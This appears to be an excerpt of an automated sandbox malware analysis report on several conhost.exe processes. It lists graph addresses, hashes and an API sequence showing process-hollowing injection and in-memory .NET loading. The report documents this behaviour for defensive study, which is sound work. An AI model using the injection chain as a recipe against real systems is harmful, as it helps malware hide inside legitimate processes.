                                                                                                                                    control_flow_graph 703 7ffa36266580-7ffa36266587 704 7ffa36266589-7ffa36266591 703->704 705 7ffa36266592-7ffa362665f9 703->705 704->705 712 7ffa36266603-7ffa36266616 705->712 713 7ffa3626661d-7ffa36266626 712->713
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d0b8f6b915c7f6387f7a4e408bfc1bd02be1ba7f0febcf46913e3d825e058f71
                                                                                                                                    • Instruction ID: 7937a9cdb2b99e3df252c3b3ada25244ed43b3ef1b9e6584378191b61228156c
                                                                                                                                    • Opcode Fuzzy Hash: d0b8f6b915c7f6387f7a4e408bfc1bd02be1ba7f0febcf46913e3d825e058f71
                                                                                                                                    • Instruction Fuzzy Hash: A411593290CA890FEB55A76C58967E67BE0EF67310F0882B6E40CC71C7DD6A544983E2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA36260118, Relevance: .1, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 714 7ffa36260118-7ffa36266626
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ffb8026e85b67d797ccff420f2404b66537f62d0100a391da70fcafe9e411e2a
                                                                                                                                    • Instruction ID: 9e341eb287c1e414ee7bc8308be7e04d8aa5cccb3bc7e1d6585655633b713839
                                                                                                                                    • Opcode Fuzzy Hash: ffb8026e85b67d797ccff420f2404b66537f62d0100a391da70fcafe9e411e2a
                                                                                                                                    • Instruction Fuzzy Hash: 77012B31A089084EEF54A76C9886BF777E0EFA6314F048177E40DC72C7DE66954983E1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA36261160, Relevance: .0, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1198a043daef4d3ca936d24be0e7e626ccee9a696ca64a6b374a3fdcc9f79c8b
                                                                                                                                    • Instruction ID: 6d2726cf9e581bda012492d4495605b12eaa90f61fc8fec31ee055c419ac8769
                                                                                                                                    • Opcode Fuzzy Hash: 1198a043daef4d3ca936d24be0e7e626ccee9a696ca64a6b374a3fdcc9f79c8b
                                                                                                                                    • Instruction Fuzzy Hash: 07E0DF60B08C0D0FDAA4F33C4884EA8A2C2EB9D21070282B2E80CC3256ED28DC81C780
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Analysis Process: conhost.exe PID: 6012 Parent PID: 6688 conhost.exeCOMMON

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:16%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:36
                                                                                                                                    Total number of Limit Nodes:2

                                                                                                                                    Graph

                                                                                                                                    execution_graph 4842 7ffa3625a30e 4843 7ffa3625a37e NtUnmapViewOfSection 4842->4843 4845 7ffa3625a3da 4843->4845 4846 7ffa36259ed0 4847 7ffa36259ed9 CreateProcessA 4846->4847 4849 7ffa3625a221 4847->4849 4850 7ffa3625a500 4851 7ffa3625a509 WriteProcessMemory 4850->4851 4853 7ffa3625a5d7 4851->4853 4854 7ffa3625a600 4855 7ffa3625a609 SetThreadContext 4854->4855 4857 7ffa3625a6aa 4855->4857 4858 7ffa3625a6dc 4859 7ffa3625a6e5 ResumeThread 4858->4859 4861 7ffa3625a784 4859->4861 4862 201f218d0af LoadLibraryA 4863 201f218d0c7 4862->4863 4864 201f218df06 4865 201f218df28 4864->4865 4866 201f218e054 LoadLibraryA 4865->4866 4867 201f218e069 4865->4867 4874 201f218df7c 4865->4874 4866->4865 4867->4874 4875 201f218e11d 4867->4875 4883 201f218d0a2 4867->4883 4869 201f218e0f3 4870 201f218e0f7 4869->4870 4876 201f218d1ba LoadLibraryA 4869->4876 4870->4869 4870->4874 4873 201f218e10c 4873->4874 4873->4875 4875->4874 4878 201f218dcb2 4875->4878 4877 201f218d1df 4876->4877 4877->4873 4879 201f218dcf2 CLRCreateInstance 4878->4879 4882 201f218dd0b 4878->4882 4879->4882 4880 201f218deb2 4880->4874 4881 201f218dea9 SafeArrayDestroy 4881->4880 4882->4880 4882->4881 4882->4882 4884 201f218d0af LoadLibraryA 4883->4884 4885 201f218d0c7 4884->4885 4885->4869

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00000201F218DF06, Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 78 201f218df06-201f218df57 call 201f218f0de * 3 85 201f218df89 78->85 86 201f218df59-201f218df5c 78->86 87 201f218df8c-201f218df9d 85->87 86->85 88 201f218df5e-201f218df61 86->88 88->85 89 201f218df63-201f218df7a 88->89 91 201f218df7c-201f218df83 89->91 92 201f218df9e-201f218dfc9 call 201f218f65e call 201f218f67e 89->92 91->85 93 201f218df85 91->93 98 201f218dfcb-201f218e000 call 201f218f292 call 201f218f152 92->98 99 201f218e006-201f218e01d call 201f218f0de 92->99 93->85 98->99 108 201f218e262-201f218e273 98->108 99->85 105 201f218e023-201f218e024 99->105 107 201f218e02a-201f218e030 105->107 109 201f218e069-201f218e073 107->109 110 201f218e032 107->110 111 201f218e2a6-201f218e2c7 call 201f218f67e 108->111 112 201f218e275-201f218e27f 108->112 114 201f218e0a1-201f218e0aa 109->114 115 201f218e075-201f218e090 call 201f218f0de 109->115 113 201f218e034-201f218e036 110->113 139 201f218e2c9 111->139 140 201f218e2cd-201f218e2cf 111->140 112->111 118 201f218e281-201f218e29f call 201f218f67e 112->118 119 201f218e050-201f218e052 113->119 120 201f218e038-201f218e03e 113->120 116 201f218e0ac-201f218e0b6 call 201f218d2d2 114->116 117 201f218e0c5-201f218e0c8 114->117 115->108 130 201f218e096-201f218e09f 115->130 116->108 136 201f218e0bc-201f218e0c3 116->136 117->108 125 201f218e0ce-201f218e0d8 117->125 118->111 119->109 128 201f218e054-201f218e067 LoadLibraryA 119->128 120->119 127 201f218e040-201f218e04e 120->127 132 201f218e0da-201f218e0db 125->132 133 201f218e0e2-201f218e0e9 125->133 127->113 127->119 128->107 130->114 130->115 132->133 137 201f218e0eb-201f218e0ec 133->137 138 201f218e11d-201f218e121 133->138 136->133 144 201f218e0ee call 201f218d0a2 137->144 141 201f218e1fd-201f218e205 138->141 142 201f218e127-201f218e149 138->142 139->140 140->87 145 201f218e257-201f218e25d call 201f218e70e 141->145 146 201f218e207-201f218e20d 141->146 142->108 155 201f218e14f-201f218e169 call 201f218f65e 142->155 147 201f218e0f3-201f218e0f5 144->147 145->108 150 201f218e20f-201f218e215 146->150 151 201f218e224-201f218e236 call 201f218dcb2 146->151 152 201f218e104-201f218e107 call 201f218d1ba 147->152 153 201f218e0f7-201f218e0fe 147->153 150->108 156 201f218e217-201f218e222 call 201f218eb6a 150->156 165 201f218e248-201f218e255 call 201f218d752 151->165 166 201f218e238-201f218e243 call 201f218e2d6 151->166 158 201f218e10c-201f218e10e 152->158 153->108 153->152 168 201f218e189-201f218e1b2 155->168 169 201f218e16b-201f218e16e 155->169 156->108 158->138 162 201f218e110-201f218e117 158->162 162->108 162->138 165->108 166->165 168->108 175 201f218e1b8-201f218e1f8 168->175 169->141 172 201f218e174-201f218e187 call 201f218f3e2 169->172 177 201f218e1fa-201f218e1fb 172->177 175->108 175->177 177->141
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.836631157.00000201F1F70000.00000040.00000001.sdmp, Offset: 00000201F1F70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_201f1f70000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                    • Instruction ID: 5b0729c19fbd94a3470bd2cb027a8ccc9c33c27a35f26f97c7cd1e49fca917de
                                                                                                                                    • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                    • Instruction Fuzzy Hash: 18C17930318B0A5BE75DEA2884DD7FA73D2FB58300F544229E44AC7597DB70D8668AC6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3625A30E, Relevance: 1.6, APIs: 1, Instructions: 111nativeCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 295 7ffa3625a30e-7ffa3625a3d8 NtUnmapViewOfSection 298 7ffa3625a3e0-7ffa3625a3fc 295->298 299 7ffa3625a3da 295->299 299->298
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.847991399.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_7ffa36250000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SectionUnmapView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 498011366-0
                                                                                                                                    • Opcode ID: 8ab7d92cda371129b10367ebb26af2295c04450ef9319d00aaff914409863300
                                                                                                                                    • Instruction ID: c8deb13c3bfa82f072a4ce7a18c36b529bdef2c57d679aeb73eb74ecca2c49f2
                                                                                                                                    • Opcode Fuzzy Hash: 8ab7d92cda371129b10367ebb26af2295c04450ef9319d00aaff914409863300
                                                                                                                                    • Instruction Fuzzy Hash: 4B31D23090C7888FDB56DB688C467A97FE1EF57320F0442AFD049C7296D6659446CB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00000201F218DCB2, Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.836631157.00000201F1F70000.00000040.00000001.sdmp, Offset: 00000201F1F70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_201f1f70000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArrayCreateDestroyInstanceSafe
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902440814-0
                                                                                                                                    • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                    • Instruction ID: 73aefb002dadea4aa6d33f9ec8f7760338940949f25a3d9102b6352833f361dd
                                                                                                                                    • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                    • Instruction Fuzzy Hash: CB815E31208B098FD768EF38C88CBA677E1FFA5301F100A6DD49BC7551EA31E5498B85
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA36259ED0, Relevance: 1.9, APIs: 1, Instructions: 383processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.847991399.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_7ffa36250000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: c74d970d7da6bd2e274f4153a6274cad53b280baa523acf61dee91b0f6e46154
                                                                                                                                    • Instruction ID: 46cc1ac868643b9e180e6e01820d7bd791cd17f9f19f79924f4f58d7f84988cd
                                                                                                                                    • Opcode Fuzzy Hash: c74d970d7da6bd2e274f4153a6274cad53b280baa523acf61dee91b0f6e46154
                                                                                                                                    • Instruction Fuzzy Hash: 06C1B530918A8D4FEB78DF58CC46BE977D1FB59310F11822AE84DC7291DF7599818B82
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3625A500, Relevance: 1.6, APIs: 1, Instructions: 127injectionCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 179 7ffa3625a500-7ffa3625a507 180 7ffa3625a509-7ffa3625a511 179->180 181 7ffa3625a512-7ffa3625a588 179->181 180->181 185 7ffa3625a58a-7ffa3625a58f 181->185 186 7ffa3625a592-7ffa3625a5d5 WriteProcessMemory 181->186 185->186 187 7ffa3625a5dd-7ffa3625a5fa 186->187 188 7ffa3625a5d7 186->188 188->187
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.847991399.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_7ffa36250000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: fbbd37da06dd4fdf8c31cf74834940075f3449a5a86f252da0b3d490c7764fc2
                                                                                                                                    • Instruction ID: b878e71d0c1613d79acde4de46a73c342ee5978890e81360e828792df882e3d1
                                                                                                                                    • Opcode Fuzzy Hash: fbbd37da06dd4fdf8c31cf74834940075f3449a5a86f252da0b3d490c7764fc2
                                                                                                                                    • Instruction Fuzzy Hash: 1531D371D0CA4C8FDB18DF989846AE9BBF0FB5A711F04422FD04DD3252CB75A8068B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00000201F218D1BA, Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 189 201f218d1ba-201f218d1dd LoadLibraryA 190 201f218d1e9-201f218d1fc 189->190 191 201f218d1df-201f218d1e4 189->191 194 201f218d2be 190->194 195 201f218d202-201f218d213 190->195 192 201f218d2c0-201f218d2d0 191->192 194->192 195->194 196 201f218d219-201f218d231 195->196 196->194 198 201f218d237-201f218d26b call 201f218f65e 196->198 198->194 203 201f218d26d-201f218d27e 198->203 203->194 204 201f218d280-201f218d297 203->204 204->194 206 201f218d299-201f218d2b9 call 201f218f65e 204->206 206->191
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.836631157.00000201F1F70000.00000040.00000001.sdmp, Offset: 00000201F1F70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_201f1f70000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                    • Instruction ID: 75877c627eb3f0003d63ca5efb3fd741a2981b5c7d0e4c4dafedb4f4a71a3c4b
                                                                                                                                    • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                    • Instruction Fuzzy Hash: 9331853170CB0D8FDB58EA68988D2AA73D6EB98310F101559EC4BC3286DDA4DD1587C6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00000201F218D0AF, Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 210 201f218d0af-201f218d0c5 LoadLibraryA 211 201f218d0d1-201f218d0e4 210->211 212 201f218d0c7-201f218d0cc 210->212 215 201f218d0ea-201f218d0fb 211->215 216 201f218d1a6 211->216 213 201f218d1a8-201f218d1b8 212->213 215->216 217 201f218d101-201f218d119 215->217 216->213 217->216 219 201f218d11f-201f218d153 call 201f218f65e 217->219 219->216 224 201f218d155-201f218d166 219->224 224->216 225 201f218d168-201f218d17f 224->225 225->216 227 201f218d181-201f218d1a1 call 201f218f65e 225->227 227->212
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.836631157.00000201F1F70000.00000040.00000001.sdmp, Offset: 00000201F1F70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_201f1f70000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                    • Instruction ID: d3ece2ff9e35530ed9c1964ae893d862b2af021992be4ad117f5dc0c11dc8e80
                                                                                                                                    • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                    • Instruction Fuzzy Hash: A731843130CB094BEB58FA68989D7A973D6EBD8320F100259EC0BC72CADDA0DD5587C6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3625A600, Relevance: 1.6, APIs: 1, Instructions: 106threadinjectionCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 300 7ffa3625a600-7ffa3625a607 301 7ffa3625a609-7ffa3625a611 300->301 302 7ffa3625a612-7ffa3625a6a8 SetThreadContext 300->302 301->302 306 7ffa3625a6b0-7ffa3625a6d7 302->306 307 7ffa3625a6aa 302->307 307->306
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.847991399.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_7ffa36250000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1591575202-0
                                                                                                                                    • Opcode ID: f09adc25cf59dd96d68b1aa8b5327f533fde5d44cb84b58c74357588e22a4262
                                                                                                                                    • Instruction ID: 75d6461e2a2b86f469d74c19244cba340a3b2c514f10f136aeb7852dfba6ef5b
                                                                                                                                    • Opcode Fuzzy Hash: f09adc25cf59dd96d68b1aa8b5327f533fde5d44cb84b58c74357588e22a4262
                                                                                                                                    • Instruction Fuzzy Hash: 9731B63090C64C8FEB58DFAC8C4A7E9BBE1EB56321F04416BD04DD3252DA75A845CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3625A6DC, Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 308 7ffa3625a6dc-7ffa3625a6e3 309 7ffa3625a6ee-7ffa3625a782 ResumeThread 308->309 310 7ffa3625a6e5-7ffa3625a6ed 308->310 313 7ffa3625a78a-7ffa3625a7a6 309->313 314 7ffa3625a784 309->314 310->309 314->313
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.847991399.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_7ffa36250000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: 8b5a5d0372e7444fbb8aec527a7a5abf6f0e08957f25713881b3ada1b9bd8df7
                                                                                                                                    • Instruction ID: 4a66b401757f26935562fe00bf03e9fe00479556d6532519b9749be31fae10ff
                                                                                                                                    • Opcode Fuzzy Hash: 8b5a5d0372e7444fbb8aec527a7a5abf6f0e08957f25713881b3ada1b9bd8df7
                                                                                                                                    • Instruction Fuzzy Hash: 8C31C53190CA4C9FDB59DBA88845BE9BBF1EF56321F04426FD04DC3292CA65A416CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00000201F218D0A2, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 315 201f218d0a2-201f218d0c5 LoadLibraryA 317 201f218d0d1-201f218d0e4 315->317 318 201f218d0c7-201f218d0cc 315->318 321 201f218d0ea-201f218d0fb 317->321 322 201f218d1a6 317->322 319 201f218d1a8-201f218d1b8 318->319 321->322 323 201f218d101-201f218d119 321->323 322->319 323->322 325 201f218d11f-201f218d153 call 201f218f65e 323->325 325->322 330 201f218d155-201f218d166 325->330 330->322 331 201f218d168-201f218d17f 330->331 331->322 333 201f218d181-201f218d1a1 call 201f218f65e 331->333 333->318
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.836631157.00000201F1F70000.00000040.00000001.sdmp, Offset: 00000201F1F70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_201f1f70000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                    • Instruction ID: 69b5f4b136a0dfed37a72a51711662048c9421a84b06be1b1c5b770c6c8e554f
                                                                                                                                    • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                    • Instruction Fuzzy Hash: 1DE0D83120CB0D1FF758E59DD88E7B666D8D799371F00002EE549C2102E085989203D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Analysis Process: conhost.exe PID: 6840 Parent PID: 864 conhost.exeCOMMON

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:21.6%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:36
                                                                                                                                    Total number of Limit Nodes:2

                                                                                                                                    Graph

                                                                                                                                    execution_graph 5202 7ffa36269fb0 5203 7ffa36269fb9 CreateProcessA 5202->5203 5205 7ffa3626a301 5203->5205 5210 7ffa3626a5e0 5211 7ffa3626a5e9 WriteProcessMemory 5210->5211 5213 7ffa3626a6b7 5211->5213 5214 7ffa3626a6e0 5215 7ffa3626a6e9 SetThreadContext 5214->5215 5217 7ffa3626a78a 5215->5217 5206 7ffa3626a3ee 5207 7ffa3626a42f NtUnmapViewOfSection 5206->5207 5209 7ffa3626a4ba 5207->5209 5218 7ffa3626a7bc 5219 7ffa3626a7c5 ResumeThread 5218->5219 5221 7ffa3626a864 5219->5221 5222 224d5b4df06 5223 224d5b4df28 5222->5223 5224 224d5b4e054 LoadLibraryA 5223->5224 5225 224d5b4df7c 5223->5225 5226 224d5b4e069 5223->5226 5224->5223 5226->5225 5228 224d5b4e11d 5226->5228 5241 224d5b4d0a2 5226->5241 5228->5225 5236 224d5b4dcb2 5228->5236 5229 224d5b4e0f3 5230 224d5b4e0f7 5229->5230 5234 224d5b4d1ba LoadLibraryA 5229->5234 5230->5225 5230->5229 5233 224d5b4e10c 5233->5225 5233->5228 5235 224d5b4d1df 5234->5235 5235->5233 5237 224d5b4dcf2 CLRCreateInstance 5236->5237 5240 224d5b4dd0b 5236->5240 5237->5240 5238 224d5b4deb2 5238->5225 5239 224d5b4dea9 SafeArrayDestroy 5239->5238 5240->5238 5240->5239 5240->5240 5242 224d5b4d0af LoadLibraryA 5241->5242 5243 224d5b4d0c7 5242->5243 5243->5229 5244 224d5b4d0af LoadLibraryA 5245 224d5b4d0c7 5244->5245

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00000224D5B4DF06, Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 193 224d5b4df06-224d5b4df57 call 224d5b4f0de * 3 200 224d5b4df89 193->200 201 224d5b4df59-224d5b4df5c 193->201 203 224d5b4df8c-224d5b4df9d 200->203 201->200 202 224d5b4df5e-224d5b4df61 201->202 202->200 204 224d5b4df63-224d5b4df7a 202->204 206 224d5b4df7c-224d5b4df83 204->206 207 224d5b4df9e-224d5b4dfc9 call 224d5b4f65e call 224d5b4f67e 204->207 206->200 208 224d5b4df85 206->208 213 224d5b4dfcb-224d5b4e000 call 224d5b4f292 call 224d5b4f152 207->213 214 224d5b4e006-224d5b4e01d call 224d5b4f0de 207->214 208->200 213->214 223 224d5b4e262-224d5b4e273 213->223 214->200 220 224d5b4e023-224d5b4e024 214->220 222 224d5b4e02a-224d5b4e030 220->222 224 224d5b4e069-224d5b4e073 222->224 225 224d5b4e032 222->225 228 224d5b4e275-224d5b4e27f 223->228 229 224d5b4e2a6-224d5b4e2c7 call 224d5b4f67e 223->229 226 224d5b4e075-224d5b4e090 call 224d5b4f0de 224->226 227 224d5b4e0a1-224d5b4e0aa 224->227 230 224d5b4e034-224d5b4e036 225->230 226->223 245 224d5b4e096-224d5b4e09f 226->245 233 224d5b4e0c5-224d5b4e0c8 227->233 234 224d5b4e0ac-224d5b4e0b6 call 224d5b4d2d2 227->234 228->229 235 224d5b4e281-224d5b4e29f call 224d5b4f67e 228->235 256 224d5b4e2c9 229->256 257 224d5b4e2cd-224d5b4e2cf 229->257 236 224d5b4e038-224d5b4e03e 230->236 237 224d5b4e050-224d5b4e052 230->237 233->223 242 224d5b4e0ce-224d5b4e0d8 233->242 234->223 253 224d5b4e0bc-224d5b4e0c3 234->253 235->229 236->237 244 224d5b4e040-224d5b4e04e 236->244 237->224 238 224d5b4e054-224d5b4e067 LoadLibraryA 237->238 238->222 247 224d5b4e0da-224d5b4e0db 242->247 248 224d5b4e0e2-224d5b4e0e9 242->248 244->230 244->237 245->226 245->227 247->248 250 224d5b4e0eb-224d5b4e0ec 248->250 251 224d5b4e11d-224d5b4e121 248->251 255 224d5b4e0ee call 224d5b4d0a2 250->255 258 224d5b4e127-224d5b4e149 251->258 259 224d5b4e1fd-224d5b4e205 251->259 253->248 260 224d5b4e0f3-224d5b4e0f5 255->260 256->257 257->203 258->223 271 224d5b4e14f-224d5b4e169 call 224d5b4f65e 258->271 261 224d5b4e257-224d5b4e25d call 224d5b4e70e 259->261 262 224d5b4e207-224d5b4e20d 259->262 263 224d5b4e104-224d5b4e107 call 224d5b4d1ba 260->263 264 224d5b4e0f7-224d5b4e0fe 260->264 261->223 267 224d5b4e224-224d5b4e236 call 224d5b4dcb2 262->267 268 224d5b4e20f-224d5b4e215 262->268 274 224d5b4e10c-224d5b4e10e 263->274 264->223 264->263 277 224d5b4e248-224d5b4e255 call 224d5b4d752 